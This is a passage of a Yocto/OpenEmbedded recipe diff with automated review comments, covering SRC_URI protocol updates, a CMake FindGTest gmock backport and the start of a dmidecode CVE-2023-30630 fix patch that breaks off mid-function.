95 file://0001-collector-Allocate-space-on-heap-for-chunks.patch \ 95 file://0001-collector-Allocate-space-on-heap-for-chunks.patch \
96 file://0001-bootchart2-support-usrmerge.patch \ 96 file://0001-bootchart2-support-usrmerge.patch \
97 file://0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch \
97 " 98 "
98 99
99S = "${WORKDIR}/git" 100S = "${WORKDIR}/git"
100SRCREV = "331ada031f1d65f6d934d918f896e1c708c64bf7" 101SRCREV = "868a2afab9da34f32c007d773b77253c93104636"
101PV .= "+git${SRCPV}"
102 102
103inherit systemd update-rc.d python3native update-alternatives 103inherit systemd update-rc.d python3native update-alternatives
104 104
@@ -144,7 +144,7 @@ do_install () {
144 144
145PACKAGES =+ "pybootchartgui" 145PACKAGES =+ "pybootchartgui"
146FILES_pybootchartgui += "${PYTHON_SITEPACKAGES_DIR}/pybootchartgui ${bindir}/pybootchartgui" 146FILES_pybootchartgui += "${PYTHON_SITEPACKAGES_DIR}/pybootchartgui ${bindir}/pybootchartgui"
147RDEPENDS_pybootchartgui = "python3-pycairo python3-compression python3-image python3-shell python3-compression python3-codecs" 147RDEPENDS_pybootchartgui = "python3-pycairo python3-compression python3-image python3-math python3-shell python3-compression python3-codecs"
148RDEPENDS_${PN}_class-target += "${@bb.utils.contains('DISTRO_FEATURES', 'sysvinit', 'sysvinit-pidof', 'procps', d)}" 148RDEPENDS_${PN}_class-target += "${@bb.utils.contains('DISTRO_FEATURES', 'sysvinit', 'sysvinit-pidof', 'procps', d)}"
149RDEPENDS_${PN}_class-target += "lsb-release" 149RDEPENDS_${PN}_class-target += "lsb-release"
150DEPENDS_append_class-native = " python3-pycairo-native" 150DEPENDS_append_class-native = " python3-pycairo-native"
diff --git a/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb b/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
index 4112cf484f..be61916cc6 100644
--- a/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
+++ b/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
@@ -15,7 +15,7 @@ DEPENDS_append_class-target = " udev"
15RDEPENDS_${PN} = "libgcc" 15RDEPENDS_${PN} = "libgcc"
16 16
17SRCREV = "3fc2326d3474a5e4df2449f5e3043f7298501334" 17SRCREV = "3fc2326d3474a5e4df2449f5e3043f7298501334"
18SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git \ 18SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git;branch=master \
19 file://0001-Add-a-possibility-to-specify-where-python-modules-ar.patch \ 19 file://0001-Add-a-possibility-to-specify-where-python-modules-ar.patch \
20 " 20 "
21 21
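Review bot: This `SRC_URI` gains `;branch=master` but keeps the plain `git://` transport, which is unauthenticated and unencrypted, whereas the GitHub-hosted recipes touched in the same change also get `protocol=https`. The pinned `SRCREV` limits what a tampered fetch could deliver, but the fetch still depends on a protocol that many networks block. If the host serves this repository over HTTPS (worth confirming), `SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git;branch=master;protocol=https \` would bring it in line with the others.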
diff --git a/meta/recipes-devtools/build-compare/build-compare_git.bb b/meta/recipes-devtools/build-compare/build-compare_git.bb
index b0560cc277..6afa9a0d68 100644
--- a/meta/recipes-devtools/build-compare/build-compare_git.bb
+++ b/meta/recipes-devtools/build-compare/build-compare_git.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "https://github.com/openSUSE/build-compare"
5LICENSE = "GPLv2" 5LICENSE = "GPLv2"
6LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe" 6LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
7 7
8SRC_URI = "git://github.com/openSUSE/build-compare.git \ 8SRC_URI = "git://github.com/openSUSE/build-compare.git;branch=master;protocol=https \
9 file://Ignore-DWARF-sections.patch;striplevel=1 \ 9 file://Ignore-DWARF-sections.patch;striplevel=1 \
10 " 10 "
11 11
diff --git a/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb b/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
index c08da6cdca..cd2ca8dbe9 100644
--- a/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
+++ b/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
@@ -3,6 +3,7 @@
3# Released under the MIT license (see packages/COPYING) 3# Released under the MIT license (see packages/COPYING)
4SUMMARY = "A set of tools for CD recording, including cdrecord" 4SUMMARY = "A set of tools for CD recording, including cdrecord"
5HOMEPAGE = "http://sourceforge.net/projects/cdrtools/" 5HOMEPAGE = "http://sourceforge.net/projects/cdrtools/"
6DESCRIPTION = "cdrecord tool is Highly portable CD/DVD/BluRay command line recording software."
6SECTION = "console/utils" 7SECTION = "console/utils"
7LICENSE = "GPLv2 & CDDL-1.0 & LGPLv2.1+" 8LICENSE = "GPLv2 & CDDL-1.0 & LGPLv2.1+"
8LIC_FILES_CHKSUM = "file://COPYING;md5=32f68170be424c2cd64804337726b312" 9LIC_FILES_CHKSUM = "file://COPYING;md5=32f68170be424c2cd64804337726b312"
diff --git a/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb b/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
index b2952ee5f5..96a7be6770 100644
--- a/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
+++ b/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
@@ -7,6 +7,7 @@ SRC_URI += "file://OEToolchainConfig.cmake \
7 file://environment.d-cmake.sh \ 7 file://environment.d-cmake.sh \
8 file://0001-CMakeDetermineSystem-use-oe-environment-vars-to-load.patch \ 8 file://0001-CMakeDetermineSystem-use-oe-environment-vars-to-load.patch \
9 file://0005-Disable-use-of-ext2fs-ext2_fs.h-by-cmake-s-internal-.patch \ 9 file://0005-Disable-use-of-ext2fs-ext2_fs.h-by-cmake-s-internal-.patch \
10 file://0006-cmake-FindGTest-Add-target-for-gmock-library.patch \
10 " 11 "
11 12
12 13
diff --git a/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch b/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch
new file mode 100644
index 0000000000..267f586a71
--- /dev/null
+++ b/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch
@@ -0,0 +1,255 @@
1From 39eae0d6c1b398f18761abac7f55944f0290f8a1 Mon Sep 17 00:00:00 2001
2From: Eero Aaltonen <eero.aaltonen@iki.fi>
3Date: Sun, 17 Oct 2021 17:13:07 +0300
4Subject: [PATCH] FindGTest: Add target for gmock library
5
6`googlemock` has been absorbed into the
7[googletest](https://github.com/google/googletest) project and is built
8and installed from the same source tree.
9
10As GTest may be built with or without GMock, skip GMock if it is not
11present.
12
13Do not provide result variables for GMock. They are not provided by
14upstream GTest's CMake Package Configuration File.
15
16Also update the test case to cover linking to `GTest::gmock`.
17
18The patch was imported from the Kitware git server
19(git@gitlab.kitware.com:cmake/cmake.git) as of commit id
2050bf457a0dd857cf976b22c5be7d333493233d1e
21
22Patch was modified to support upper case variable `GTEST_FOUND`.
23
24Upstream-Status: Accepted [https://gitlab.kitware.com/cmake/cmake/-/merge_requests/6632]
25Milestone: 3.23.0
26
27Signed-off-by: Eero Aaltonen <eero.aaltonen@vaisala.com>
28---
29 .../dev/FindGTest-target-for-gmock.rst | 4 +
30 Modules/FindGTest.cmake | 133 +++++++++++++++---
31 Tests/FindGTest/Test/CMakeLists.txt | 4 +
32 3 files changed, 121 insertions(+), 20 deletions(-)
33 create mode 100644 Help/release/dev/FindGTest-target-for-gmock.rst
34
35diff --git a/Help/release/dev/FindGTest-target-for-gmock.rst b/Help/release/dev/FindGTest-target-for-gmock.rst
36new file mode 100644
37index 0000000000..f78242c80e
38--- /dev/null
39+++ b/Help/release/dev/FindGTest-target-for-gmock.rst
40@@ -0,0 +1,4 @@
41+FindGTest-target-for-gmock
42+--------------------------
43+
44+* The :module:`FindGTest` module now provides a target for GMock, if found.
45diff --git a/Modules/FindGTest.cmake b/Modules/FindGTest.cmake
46index e015a9840f..0331049594 100644
47--- a/Modules/FindGTest.cmake
48+++ b/Modules/FindGTest.cmake
49@@ -7,10 +7,23 @@ FindGTest
50
51 Locate the Google C++ Testing Framework.
52
53+.. versionadded:: 3.20
54+ Upstream ``GTestConfig.cmake`` is used if possible.
55+
56 Imported targets
57 ^^^^^^^^^^^^^^^^
58
59-This module defines the following :prop_tgt:`IMPORTED` targets:
60+ This module defines the following :prop_tgt:`IMPORTED` targets:
61+
62+``GTest::gtest``
63+ The Google Test ``gtest`` library, if found; adds Thread::Thread
64+ automatically
65+``GTest::gtest_main``
66+ The Google Test ``gtest_main`` library, if found
67+
68+.. deprecated:: 3.20
69+ For backwards compatibility, this module defines additionally the
70+ following deprecated :prop_tgt:`IMPORTED` targets (available since 3.5):
71
72 ``GTest::GTest``
73 The Google Test ``gtest`` library, if found; adds Thread::Thread
74@@ -18,7 +31,6 @@ This module defines the following :prop_tgt:`IMPORTED` targets:
75 ``GTest::Main``
76 The Google Test ``gtest_main`` library, if found
77
78-
79 Result variables
80 ^^^^^^^^^^^^^^^^
81
82@@ -146,8 +158,42 @@ function(__gtest_import_library _target _var _config)
83 endif()
84 endfunction()
85
86+function(__gtest_define_backwards_compatible_library_targets)
87+ set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES} PARENT_SCOPE)
88+
89+ # Add targets mapping the same library names as defined in
90+ # older versions of CMake's FindGTest
91+ if(NOT TARGET GTest::GTest)
92+ add_library(GTest::GTest INTERFACE IMPORTED)
93+ target_link_libraries(GTest::GTest INTERFACE GTest::gtest)
94+ endif()
95+ if(NOT TARGET GTest::Main)
96+ add_library(GTest::Main INTERFACE IMPORTED)
97+ target_link_libraries(GTest::Main INTERFACE GTest::gtest_main)
98+ endif()
99+endfunction()
100+
101 #
102
103+include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake)
104+
105+# first specifically look for the CMake version of GTest
106+find_package(GTest QUIET NO_MODULE)
107+
108+# if we found the GTest cmake package then we are done, and
109+# can print what we found and return.
110+if(GTest_FOUND)
111+ set(GTEST_FOUND ${GTest_FOUND})
112+ FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest HANDLE_COMPONENTS CONFIG_MODE)
113+
114+ set(GTEST_LIBRARIES GTest::gtest)
115+ set(GTEST_MAIN_LIBRARIES GTest::gtest_main)
116+
117+ __gtest_define_backwards_compatible_library_targets()
118+
119+ return()
120+endif()
121+
122 if(NOT DEFINED GTEST_MSVC_SEARCH)
123 set(GTEST_MSVC_SEARCH MD)
124 endif()
125@@ -194,50 +240,97 @@ if(MSVC AND GTEST_MSVC_SEARCH STREQUAL "MD")
126 __gtest_find_library(GTEST_LIBRARY_DEBUG gtest-mdd gtestd)
127 __gtest_find_library(GTEST_MAIN_LIBRARY gtest_main-md gtest_main)
128 __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_main-mdd gtest_maind)
129+ __gtest_find_library(GMOCK_LIBRARY gmock-md gmock)
130+ __gtest_find_library(GMOCK_LIBRARY_DEBUG gmock-mdd gmockd)
131+ __gtest_find_library(GMOCK_MAIN_LIBRARY gmock_main-md gmock_main)
132+ __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_main-mdd gmock_maind)
133 else()
134 __gtest_find_library(GTEST_LIBRARY gtest)
135 __gtest_find_library(GTEST_LIBRARY_DEBUG gtestd)
136 __gtest_find_library(GTEST_MAIN_LIBRARY gtest_main)
137 __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_maind)
138+ __gtest_find_library(GMOCK_LIBRARY gmock)
139+ __gtest_find_library(GMOCK_LIBRARY_DEBUG gmockd)
140+ __gtest_find_library(GMOCK_MAIN_LIBRARY gmock_main)
141+ __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_maind)
142 endif()
143
144-include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake)
145 FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest DEFAULT_MSG GTEST_LIBRARY GTEST_INCLUDE_DIR GTEST_MAIN_LIBRARY)
146
147-if(GTEST_FOUND)
148+if(GMOCK_LIBRARY AND GMOCK_MAIN_LIBRARY)
149+ set(GMock_FOUND True)
150+else()
151+ set(GMock_FOUND False)
152+endif()
153+
154+if(GTest_FOUND)
155 set(GTEST_INCLUDE_DIRS ${GTEST_INCLUDE_DIR})
156 __gtest_append_debugs(GTEST_LIBRARIES GTEST_LIBRARY)
157 __gtest_append_debugs(GTEST_MAIN_LIBRARIES GTEST_MAIN_LIBRARY)
158- set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES})
159
160 find_package(Threads QUIET)
161
162- if(NOT TARGET GTest::GTest)
163+ if(NOT TARGET GTest::gtest)
164 __gtest_determine_library_type(GTEST_LIBRARY)
165- add_library(GTest::GTest ${GTEST_LIBRARY_TYPE} IMPORTED)
166+ add_library(GTest::gtest ${GTEST_LIBRARY_TYPE} IMPORTED)
167 if(TARGET Threads::Threads)
168- set_target_properties(GTest::GTest PROPERTIES
169+ set_target_properties(GTest::gtest PROPERTIES
170 INTERFACE_LINK_LIBRARIES Threads::Threads)
171 endif()
172 if(GTEST_LIBRARY_TYPE STREQUAL "SHARED")
173- set_target_properties(GTest::GTest PROPERTIES
174+ set_target_properties(GTest::gtest PROPERTIES
175 INTERFACE_COMPILE_DEFINITIONS "GTEST_LINKED_AS_SHARED_LIBRARY=1")
176 endif()
177 if(GTEST_INCLUDE_DIRS)
178- set_target_properties(GTest::GTest PROPERTIES
179+ set_target_properties(GTest::gtest PROPERTIES
180 INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}")
181 endif()
182- __gtest_import_library(GTest::GTest GTEST_LIBRARY "")
183- __gtest_import_library(GTest::GTest GTEST_LIBRARY "RELEASE")
184- __gtest_import_library(GTest::GTest GTEST_LIBRARY "DEBUG")
185+ __gtest_import_library(GTest::gtest GTEST_LIBRARY "")
186+ __gtest_import_library(GTest::gtest GTEST_LIBRARY "RELEASE")
187+ __gtest_import_library(GTest::gtest GTEST_LIBRARY "DEBUG")
188 endif()
189- if(NOT TARGET GTest::Main)
190+ if(NOT TARGET GTest::gtest_main)
191 __gtest_determine_library_type(GTEST_MAIN_LIBRARY)
192- add_library(GTest::Main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED)
193- set_target_properties(GTest::Main PROPERTIES
194- INTERFACE_LINK_LIBRARIES "GTest::GTest")
195- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "")
196- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "RELEASE")
197- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "DEBUG")
198+ add_library(GTest::gtest_main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED)
199+ set_target_properties(GTest::gtest_main PROPERTIES
200+ INTERFACE_LINK_LIBRARIES "GTest::gtest")
201+ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "")
202+ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "RELEASE")
203+ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "DEBUG")
204+ endif()
205+
206+ __gtest_define_backwards_compatible_library_targets()
207+endif()
208+
209+if(GMock_FOUND)
210+ if(NOT TARGET GTest::gmock)
211+ __gtest_determine_library_type(GMOCK_LIBRARY)
212+ add_library(GTest::gmock ${GMOCK_LIBRARY_TYPE} IMPORTED)
213+ set(_gmock_link_libraries "GTest::gtest")
214+ if(TARGET Threads::Threads)
215+ list(APPEND _gmock_link_libraries Threads::Threads)
216+ endif()
217+ set_target_properties(GTest::gmock PROPERTIES
218+ INTERFACE_LINK_LIBRARIES "${_gmock_link_libraries}")
219+ if(GMOCK_LIBRARY_TYPE STREQUAL "SHARED")
220+ set_target_properties(GTest::gmock PROPERTIES
221+ INTERFACE_COMPILE_DEFINITIONS "GMOCK_LINKED_AS_SHARED_LIBRARY=1")
222+ endif()
223+ if(GTEST_INCLUDE_DIRS)
224+ set_target_properties(GTest::gmock PROPERTIES
225+ INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}")
226+ endif()
227+ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "")
228+ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "RELEASE")
229+ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "DEBUG")
230+ endif()
231+ if(NOT TARGET GTest::gmock_main)
232+ __gtest_determine_library_type(GMOCK_MAIN_LIBRARY)
233+ add_library(GTest::gmock_main ${GMOCK_MAIN_LIBRARY_TYPE} IMPORTED)
234+ set_target_properties(GTest::gmock_main PROPERTIES
235+ INTERFACE_LINK_LIBRARIES "GTest::gmock")
236+ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "")
237+ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "RELEASE")
238+ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "DEBUG")
239 endif()
240 endif()
241diff --git a/Tests/FindGTest/Test/CMakeLists.txt b/Tests/FindGTest/Test/CMakeLists.txt
242index b65b9d28f6..7d3a378a65 100644
243--- a/Tests/FindGTest/Test/CMakeLists.txt
244+++ b/Tests/FindGTest/Test/CMakeLists.txt
245@@ -12,3 +12,7 @@ add_executable(test_gtest_var main.cxx)
246 target_include_directories(test_gtest_var PRIVATE ${GTEST_INCLUDE_DIRS})
247 target_link_libraries(test_gtest_var PRIVATE ${GTEST_BOTH_LIBRARIES} ${CMAKE_THREAD_LIBS_INIT})
248 add_test(NAME test_gtest_var COMMAND test_gtest_var)
249+
250+add_executable(test_gmock_tgt main.cxx)
251+target_link_libraries(test_gmock_tgt GTest::gmock_main)
252+add_test(NAME test_gmock_tgt COMMAND test_gmock_tgt)
253--
2542.17.1
255
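Review bot: The `if(GMock_FOUND)` block in the Modules/FindGTest.cmake part of this patch comes after the `endif()` that closes `if(GTest_FOUND)`, so `GTest::gmock` can be created with `INTERFACE_LINK_LIBRARIES` naming `GTest::gtest` even when GTest itself was not found and that target was never defined. Changing the condition to `if(GTest_FOUND AND GMock_FOUND)` keeps the gmock targets from referring to a missing target and from being set up with an empty `GTEST_INCLUDE_DIRS`. The patch header says it was modified locally to support upper-case `GTEST_FOUND`; a short comment beside `set(GTEST_FOUND ${GTest_FOUND})` marking it as the local deviation from upstream would make a later rebase easier to check.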
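diff --git a/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake b/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
index 398069eef2..870009c2ba 100644
--- a/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
+++ b/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
@@ -2,7 +2,6 @@ set( CMAKE_SYSTEM_NAME Linux )
 set( CMAKE_C_FLAGS $ENV{CFLAGS} CACHE STRING "" FORCE )
 set( CMAKE_CXX_FLAGS $ENV{CXXFLAGS} CACHE STRING "" FORCE )
 set( CMAKE_ASM_FLAGS ${CMAKE_C_FLAGS} CACHE STRING "" FORCE )
-set( CMAKE_LDFLAGS_FLAGS ${CMAKE_CXX_FLAGS} CACHE STRING "" FORCE )
 set( CMAKE_SYSROOT $ENV{OECORE_TARGET_SYSROOT} )
 
 set( CMAKE_FIND_ROOT_PATH $ENV{OECORE_TARGET_SYSROOT} )
@@ -13,13 +12,13 @@ set( CMAKE_FIND_ROOT_PATH_MODE_PACKAGE ONLY )
 
 set(CMAKE_FIND_LIBRARY_CUSTOM_LIB_SUFFIX "$ENV{OE_CMAKE_FIND_LIBRARY_CUSTOM_LIB_SUFFIX}")
 
-# Set CMAKE_SYSTEM_PROCESSOR from the sysroot name (assuming processor-distro-os).
-if ($ENV{SDKTARGETSYSROOT} MATCHES "/sysroots/([a-zA-Z0-9_-]+)-.+-.+")
- set(CMAKE_SYSTEM_PROCESSOR ${CMAKE_MATCH_1})
-endif()
+set( CMAKE_SYSTEM_PROCESSOR $ENV{OECORE_TARGET_ARCH} )
 
 # Include the toolchain configuration subscripts
 file( GLOB toolchain_config_files "${CMAKE_TOOLCHAIN_FILE}.d/*.cmake" )
 foreach(config ${toolchain_config_files})
  include(${config})
 endforeach()
+
+unset(CMAKE_C_IMPLICIT_INCLUDE_DIRECTORIES)
+unset(CMAKE_CXX_IMPLICIT_INCLUDE_DIRECTORIES)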
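Review bot: `set( CMAKE_SYSTEM_PROCESSOR $ENV{OECORE_TARGET_ARCH} )` in the second hunk assigns unconditionally, so when OECORE_TARGET_ARCH is not exported the variable silently becomes empty, whereas the removed code left it untouched when its pattern did not match. Wrapping the assignment in `if(DEFINED ENV{OECORE_TARGET_ARCH})`, or stopping with `message(FATAL_ERROR ...)` when it is missing, makes a configure run started outside the SDK environment script fail early instead of building for an empty processor name. The two added `unset(..._IMPLICIT_INCLUDE_DIRECTORIES)` calls have no comment; one line stating why they are needed would help, since their purpose cannot be read from this file.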
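diff --git a/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb b/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
index c6a53ffece..3c403a4077 100644
--- a/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
+++ b/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
@@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/rpm-software-management/createrepo_c/wiki"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 
-SRC_URI = "git://github.com/rpm-software-management/createrepo_c \
+SRC_URI = "git://github.com/rpm-software-management/createrepo_c;branch=master;protocol=https \
  file://0001-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \
  "
 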
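diff --git a/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb b/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
index 10220ebc91..ce242c3593 100644
--- a/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
+++ b/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
@@ -1,11 +1,13 @@
 SUMMARY = "GNU unit testing framework, written in Expect and Tcl"
 DESCRIPTION = "DejaGnu is a framework for testing other programs. Its purpose \
 is to provide a single front end for all tests."
+HOMEPAGE = "https://www.gnu.org/software/dejagnu/"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
 SECTION = "devel"
 
 DEPENDS += "expect-native"
+RDEPENDS_${PN} = "expect"
 
 inherit autotools
 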
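diff --git a/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb b/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
index aecba07235..0418ae0c5f 100644
--- a/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
+++ b/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
@@ -1,6 +1,7 @@
-SECTION = "console/utils"
 SUMMARY = "Command line utilities for working with *.desktop files"
+DESCRIPTION = "desktop-file-utils contains a few command line utilities for working with desktop entries"
 HOMEPAGE = "http://www.freedesktop.org/wiki/Software/desktop-file-utils"
+SECTION = "console/utils"
 LICENSE = "GPLv2+"
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \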
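diff --git a/meta/recipes-devtools/devel-config/distcc-config.bb b/meta/recipes-devtools/devel-config/distcc-config.bb
index 3cd661d543..db9e8bbcc9 100644
--- a/meta/recipes-devtools/devel-config/distcc-config.bb
+++ b/meta/recipes-devtools/devel-config/distcc-config.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Sets up distcc for compilation on the target device"
+DESCRIPTION = "${SUMMARY}"
 
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"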
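diff --git a/meta/recipes-devtools/distcc/distcc_3.3.3.bb b/meta/recipes-devtools/distcc/distcc_3.3.3.bb
index c52f136be8..2a74a068f1 100644
--- a/meta/recipes-devtools/distcc/distcc_3.3.3.bb
+++ b/meta/recipes-devtools/distcc/distcc_3.3.3.bb
@@ -1,6 +1,7 @@
 SUMMARY = "A parallel build system"
 DESCRIPTION = "distcc is a parallel build system that distributes \
 compilation of C/C++/ObjC code across machines on a network."
+HOMEPAGE = "https://github.com/distcc/distcc"
 SECTION = "devel"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
@@ -14,7 +15,7 @@ PACKAGECONFIG[popt] = "--without-included-popt,--with-included-popt,popt"
 
 RRECOMMENDS_${PN}-server = "avahi-daemon"
 
-SRC_URI = "git://github.com/distcc/distcc.git \
+SRC_URI = "git://github.com/distcc/distcc.git;branch=master;protocol=https \
  file://fix-gnome.patch \
  file://separatebuilddir.patch \
  file://default \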
diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch
new file mode 100644
index 0000000000..f1d449acbe
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch
@@ -0,0 +1,236 @@
1From 24def311c6168d0dfb7c5f0f183b72b709c49265 Mon Sep 17 00:00:00 2001
2From: Jean Delvare <jdelvare@suse.de>
3Date: Mon, 20 Feb 2023 14:53:21 +0100
4Subject: [PATCH] dmidecode: Split table fetching from decoding
5
6Clean up function dmi_table so that it does only one thing:
7* dmi_table() is renamed to dmi_table_get(). It now retrieves the
8 DMI table, but does not process it any longer.
9* Decoding or dumping the table is now done in smbios3_decode(),
10 smbios_decode() and legacy_decode().
11No functional change.
12
13A side effect of this change is that writing the header and body of
14dump files is now done in a single location. This is required to
15further consolidate the writing of dump files.
16
17CVE-ID: CVE-2023-30630
18Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=39b2dd7b6ab7]
19
20Backport Changes:
21- In the file dmidecode.c, the commit [dd593d2] in v3.3 introduces
22 pr_info(). This is backported to printf() as per v3.2.
23
24Signed-off-by: Jean Delvare <jdelvare@suse.de>
25Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
26(cherry picked from commit 39b2dd7b6ab719b920e96ed832cfb4bdd664e808)
27Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
28---
29 dmidecode.c | 86 ++++++++++++++++++++++++++++++++++++++---------------
30 1 file changed, 62 insertions(+), 24 deletions(-)
31
32diff --git a/dmidecode.c b/dmidecode.c
33index a3e9d6c..d6eedd1 100644
34--- a/dmidecode.c
35+++ b/dmidecode.c
36@@ -5211,8 +5211,9 @@ static void dmi_table_decode(u8 *buf, u32 len, u16 num, u16 ver, u32 flags)
37 }
38 }
39
40-static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
41- u32 flags)
42+/* Allocates a buffer for the table, must be freed by the caller */
43+static u8 *dmi_table_get(off_t base, u32 *len, u16 num, u32 ver,
44+ const char *devmem, u32 flags)
45 {
46 u8 *buf;
47
48@@ -5231,7 +5232,7 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
49 {
50 if (num)
51 printf("%u structures occupying %u bytes.\n",
52- num, len);
53+ num, *len);
54 if (!(opt.flags & FLAG_FROM_DUMP))
55 printf("Table at 0x%08llX.\n",
56 (unsigned long long)base);
57@@ -5249,19 +5250,19 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
58 * would be the result of the kernel truncating the table on
59 * parse error.
60 */
61- size_t size = len;
62+ size_t size = *len;
63 buf = read_file(flags & FLAG_NO_FILE_OFFSET ? 0 : base,
64 &size, devmem);
65- if (!(opt.flags & FLAG_QUIET) && num && size != (size_t)len)
66+ if (!(opt.flags & FLAG_QUIET) && num && size != (size_t)*len)
67 {
68 fprintf(stderr, "Wrong DMI structures length: %u bytes "
69 "announced, only %lu bytes available.\n",
70- len, (unsigned long)size);
71+ *len, (unsigned long)size);
72 }
73- len = size;
74+ *len = size;
75 }
76 else
77- buf = mem_chunk(base, len, devmem);
78+ buf = mem_chunk(base, *len, devmem);
79
80 if (buf == NULL)
81 {
82@@ -5271,15 +5272,9 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
83 fprintf(stderr,
84 "Try compiling dmidecode with -DUSE_MMAP.\n");
85 #endif
86- return;
87 }
88
89- if (opt.flags & FLAG_DUMP_BIN)
90- dmi_table_dump(buf, len);
91- else
92- dmi_table_decode(buf, len, num, ver >> 8, flags);
93-
94- free(buf);
95+ return buf;
96 }
97
98
99@@ -5314,8 +5309,9 @@ static void overwrite_smbios3_address(u8 *buf)
100
101 static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
102 {
103- u32 ver;
104+ u32 ver, len;
105 u64 offset;
106+ u8 *table;
107
108 /* Don't let checksum run beyond the buffer */
109 if (buf[0x06] > 0x20)
110@@ -5341,8 +5337,12 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
111 return 0;
112 }
113
114- dmi_table(((off_t)offset.h << 32) | offset.l,
115- DWORD(buf + 0x0C), 0, ver, devmem, flags | FLAG_STOP_AT_EOT);
116+ /* Maximum length, may get trimmed */
